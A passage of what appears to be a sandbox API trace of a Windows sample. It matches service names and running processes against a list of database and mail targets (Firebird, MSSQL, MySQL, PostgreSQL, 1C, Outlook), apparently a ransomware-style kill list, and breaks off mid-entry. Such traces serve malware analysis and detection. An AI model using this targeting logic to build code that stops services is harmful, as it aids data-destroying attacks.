lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0036.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0036.208] lstrlenW (lpString="DcomLaunch") returned 10 [0036.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.208] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0036.208] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0036.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0036.208] lstrlenW (lpString="Dhcp") returned 4 [0036.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0036.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0036.208] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0036.208] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0036.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0036.208] lstrlenW (lpString="Dnscache") returned 8 [0036.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0036.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0036.208] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0036.208] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0036.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0036.208] lstrlenW (lpString="DPS") returned 3 [0036.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0036.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0036.208] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0036.208] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0036.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0036.208] lstrlenW (lpString="eventlog") returned 8 [0036.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0036.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0036.208] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0036.208] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0036.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0036.209] lstrlenW (lpString="EventSystem") returned 11 [0036.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0036.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0036.209] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0036.209] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0036.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0036.209] lstrlenW (lpString="gpsvc") returned 5 [0036.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0036.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0036.209] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0036.209] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0036.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0036.209] lstrlenW (lpString="iphlpsvc") returned 8 [0036.209] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.209] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.209] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0036.209] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0036.209] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0036.209] lstrlenW (lpString="LanmanServer") returned 12 [0036.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0036.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0036.210] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0036.210] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0036.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0036.210] lstrlenW (lpString="LanmanWorkstation") returned 17 [0036.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.210] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0036.210] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0036.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0036.210] lstrlenW (lpString="lmhosts") returned 7 [0036.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0036.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0036.210] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0036.210] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0036.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0036.210] lstrlenW (lpString="MMCSS") returned 5 [0036.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0036.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0036.210] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0036.210] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0036.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0036.210] lstrlenW (lpString="MpsSvc") returned 6 [0036.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0036.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0036.210] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0036.210] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0036.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0036.210] lstrlenW (lpString="Netman") returned 6 [0036.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0036.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0036.211] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0036.211] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0036.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0036.211] lstrlenW (lpString="netprofm") returned 8 [0036.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0036.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0036.211] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0036.211] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0036.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0036.211] lstrlenW (lpString="NlaSvc") returned 6 [0036.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0036.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0036.211] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0036.211] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0036.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0036.211] lstrlenW (lpString="nsi") returned 3 [0036.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0036.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0036.211] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0036.211] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0036.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0036.211] lstrlenW (lpString="PcaSvc") returned 6 [0036.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0036.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0036.211] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0036.211] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0036.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0036.211] lstrlenW (lpString="PlugPlay") returned 8 [0036.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0036.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0036.211] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0036.211] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0036.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0036.212] lstrlenW (lpString="Power") returned 5 [0036.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0036.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0036.212] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0036.212] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0036.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0036.212] lstrlenW (lpString="ProfSvc") returned 7 [0036.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0036.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0036.212] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0036.212] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0036.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0036.212] lstrlenW (lpString="RpcEptMapper") returned 12 [0036.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.212] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0036.212] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0036.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0036.212] lstrlenW (lpString="RpcSs") returned 5 [0036.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0036.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0036.212] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0036.212] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0036.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0036.212] lstrlenW (lpString="SamSs") returned 5 [0036.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0036.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0036.212] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0036.212] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0036.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0036.212] lstrlenW (lpString="Schedule") returned 8 [0036.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0036.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0036.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0036.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0036.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0036.213] lstrlenW (lpString="SENS") returned 4 [0036.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0036.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0036.213] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0036.213] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0036.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0036.213] lstrlenW (lpString="ShellHWDetection") returned 16 [0036.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.213] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0036.213] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0036.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0036.213] lstrlenW (lpString="Spooler") returned 7 [0036.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0036.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0036.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0036.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0036.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0036.213] lstrlenW (lpString="SysMain") returned 7 [0036.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0036.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0036.213] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0036.213] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0036.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0036.213] lstrlenW (lpString="Themes") returned 6 [0036.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0036.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0036.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0036.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0036.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0036.214] lstrlenW (lpString="TrkWks") returned 6 [0036.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0036.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0036.214] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0036.214] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0036.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0036.214] lstrlenW (lpString="UxSms") returned 5 [0036.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0036.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0036.214] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0036.214] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0036.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0036.214] lstrlenW (lpString="VSS") returned 3 [0036.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0036.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0036.214] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0036.214] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0036.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0036.214] lstrlenW (lpString="WdiServiceHost") returned 14 [0036.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.214] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0036.214] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0036.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0036.214] lstrlenW (lpString="WdiSystemHost") returned 13 [0036.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.214] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0036.214] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0036.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0036.214] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0036.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.214] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0036.215] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0036.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0036.215] lstrlenW (lpString="Winmgmt") returned 7 [0036.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0036.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0036.215] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0036.215] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0036.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0036.215] lstrlenW (lpString="WPDBusEnum") returned 10 [0036.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.215] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0036.215] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0036.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0036.215] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbcaca8 | out: hHeap=0xb10000) returned 1 [0036.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc [0036.217] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0036.218] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0036.219] lstrlenW (lpString="System") returned 6 [0036.219] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0036.219] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0036.219] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0036.219] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0036.219] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0036.219] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0036.219] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0036.219] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0036.220] lstrlenW (lpString="smss.exe") returned 8 [0036.220] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0036.220] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0036.220] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0036.220] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0036.220] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0036.220] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0036.220] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0036.220] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.221] lstrlenW (lpString="csrss.exe") returned 9 [0036.221] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.221] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0036.221] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.221] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0036.221] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.221] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.221] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.221] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0036.222] lstrlenW (lpString="wininit.exe") returned 11 [0036.222] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0036.222] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0036.222] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0036.222] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0036.222] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0036.222] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0036.222] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0036.222] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.223] lstrlenW (lpString="csrss.exe") returned 9 [0036.223] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.223] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0036.223] lstrlenW (lpString="winlogon.exe") returned 12 [0036.223] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0036.224] lstrlenW (lpString="services.exe") returned 12 [0036.224] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0036.225] lstrlenW (lpString="lsass.exe") returned 9 [0036.225] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0036.226] lstrlenW (lpString="lsm.exe") returned 7 [0036.226] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.226] lstrlenW (lpString="svchost.exe") returned 11 [0036.226] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.227] lstrlenW (lpString="svchost.exe") returned 11 [0036.227] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.228] lstrlenW (lpString="svchost.exe") returned 11 [0036.228] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.229] lstrlenW (lpString="svchost.exe") returned 11 [0036.229] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.229] lstrlenW (lpString="svchost.exe") returned 11 [0036.229] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0036.230] lstrlenW (lpString="audiodg.exe") returned 11 [0036.230] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 